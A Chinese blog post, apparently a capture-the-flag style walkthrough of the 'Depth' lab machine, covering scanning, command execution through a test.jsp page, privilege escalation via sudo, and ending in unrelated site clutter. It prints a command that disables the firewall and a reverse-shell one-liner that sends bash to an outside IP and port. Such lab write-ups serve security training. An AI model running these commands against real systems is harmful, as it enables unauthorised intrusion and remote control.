Depth靶机

Gigity123

于 2024-09-25 19:12:13 发布

阅读量171

点赞数 1

文章标签：网络安全

本文链接：https://blog.csdn.net/2301_80154010/article/details/142530879

版权

主机发现

arp-scan -l

端口扫描

nmap -sV -sC -sT -O 192.168.224.136 -p-

目录扫描

dirb http://192.168.224.136:8080
dirsearch -u http://192.168.224.136:8080
# 因为只开启了8080端口，所以目录扫描的时候加上8080

两种扫描分别扫到 /manager 和 /test.jsp 和 /index.html

浏览器访问

根据提示输入 ls -l /tmp 发现可以执行

ls -l /tmp

尝试输入 ls -l /home，

 ls -l /home

发现一个 bill 用户

ps -aux  # 查看一下进程

发现 sshd 正在使用中，可能是被防火墙限制了，可以尝试关闭防火墙

ssh bill@localhost sudo ufw disable

反弹shell

利用ssh反弹shell

ssh bill@localhost bash -i>& /dev/tcp/47.95.210.94/7766 0>&1     
# ip是云服务器或者kali

远程服务器或kali 开启 7766监听端口

nc -lvvp 7766

成功反弹到shell

提权

sudo -l

从NOPASSWD中，可以看出切换root 不需要密码直接sudo su

sudo su

提权成功

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Gigity123

关注关注

1
点赞
踩
3

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

vulnhub靶机实战-My-cmsms靶机

09-29

vulnhub靶机实战-My-cmsms靶机本文档将针对vulnhub靶机实战-My-cmsms靶机，详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。主机发现在靶机实战中，主机发现是指通过各种技术手段来发现目标网络中...

web渗透测试靶机（新手）

05-07

Web渗透测试靶机是针对新手入门的网络安全学习平台，它模拟了实际的Web应用程序环境，让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用，让学习者通过查找和利用...

参与评论您还未登录，请先登录后发表或查看评论

安装部署Web安全测试用的靶机

11-24

为了进行有效的测试，我们需要模拟真实的环境，这就是靶机的作用。本实验旨在通过安装部署Web安全测试靶机，包括DVWA、MCIR、Pikachu、mutillidae和BWAPP，来提供一个安全学习和实践的平台。首先，安装XAMPP，这是...

05-23

03-05

一文解读，网络安全行业人才需求情况《网络安全产业人才发展报告》

weixin_59086772的博客

10-18

8508

随着近几天国家网络安全宣传周在全国各地开展活动，网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里，惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何？该怎么提升自我能力，更快地加入网安行列。今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。一、网络安全行业市场发展情况网络时代生活越来越离不开网络，与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障，个人和企业等重.

numcodecs-0.10.0-cp39-cp39-win_amd64.whl

10-19

numcodecs-0.10.0-cp39-cp39-win_amd64.whl

【BP时序预测】基于雾凇优化算法RIME-BP实现负荷数据预测单输入单输出附matlab代码.rar

10-20

1.版本：matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点：参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象：计算机，电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。替换数据可以直接使用，注释清楚，适合新手

【JCR一区级】Matlab实现北方苍鹰优化算法NGO-CNN-BiLSTM-Attention的故障诊断算法研究.rar

10-20

双碳数字化平台及场景应用解决方案（28页 PPT）.pptx

10-19

双碳数字化平台及场景应用解决方案（28页 PPT）

低级编程语言汇编的特性, 项目案例及应用场景

10-19

汇编语言内容概要：本文详细介绍了汇编语言的特点、应用场景及其编写示例。汇编语言是一种低级编程语言，使用助记符来代表机器指令，与硬件紧密结合，执行效率高但可读性差。常见应用场景包括操作系统内核、设备驱动程序、嵌入式系统、性能优化等领域。适用人群：软件开发人员，特别是对底层编程感兴趣的开发人员。使用场景及目标：了解汇编语言的基本概念和特点；学习在操作系统内核、设备驱动程序、嵌入式系统、性能优化等场景中使用汇编语言的方法和技巧；掌握汇编语言的基础知识和编程工具。其他说明：文章还提供了学习汇编语言的方法和资源，帮助初学者快速入门。

数学建模模板华为杯，高教杯

10-19

数学建模模板华为杯，高教杯

毕业设计项目Python基于机器学习的商品评论情感分析项目源码+数据集+训练好的模型+GUI界面

10-19

毕业设计项目Python基于机器学习的商品评论情感分析项目源码+数据集+训练好的模型+GUI界面，该项目是个人毕设项目，答辩评审分达到98分，代码都经过调试测试，确保可以运行！欢迎下载使用，可用于小白学习、进阶。该资源主要针对计算机、通信、人工智能、自动化等相关专业的学生、老师或从业者下载使用，亦可作为期末课程设计、课程大作业、毕业设计等。项目整体具有较高的学习借鉴价值！基础能力强的可以在此基础上修改调整，以实现不同的功能。毕业设计项目Python基于机器学习的商品评论情感分析项目源码+数据集+训练好的模型+GUI界面毕业设计项目Python基于机器学习的商品评论情感分析项目源码+数据集+训练好的模型+GUI界面毕业设计项目Python基于机器学习的商品评论情感分析项目源码+数据集+训练好的模型+GUI界面毕业设计项目Python基于机器学习的商品评论情感分析项目源码+数据集+训练好的模型+GUI界面毕业设计项目Python基于机器学习的商品评论情感分析项目源码+数据集+

MinGW64(1).zip

10-19

MinGW64(1).zip

综合糖尿病健康数据集.zip

10-19

背景描述糖尿病是一种影响全球数百万人的慢性疾病，对公共健康构成重大威胁。准确预测糖尿病的发病风险对于早期干预和预防至关重要。通过机器学习模型分析影响糖尿病的主要因素，可以帮助医疗从业者更好地了解病因和风险因素，从而制定有效的预防和治疗策略。本数据集来自Kaggle，包含了患者的各项健康指标及其是否患有糖尿病的标签。数据集的主要目标是通过机器学习模型预测糖尿病的发病风险，并分析影响糖尿病的主要健康因素。

算法部署-使用ONNX部署YOLOv8-obb旋转目标检测算法-附推理代码+效果展示-优质项目实战.zip

10-19

算法部署_使用ONNX部署YOLOv8-obb旋转目标检测算法_附推理代码+效果展示_优质项目实战

【高创新】基于非洲秃鹫优化算法AVOA-CNN-LSTM-Attention的用客流量预测算法研究Matlab实现.rar

10-20

大棚蔬菜种植基地建设项目可行性研究报告.doc

10-19

大棚蔬菜种植基地建设项目可行性研究报告.doc

【高创新】基于凌日优化算法TSOA-CNN-LSTM-Attention的用客流量预测算法研究Matlab实现.rar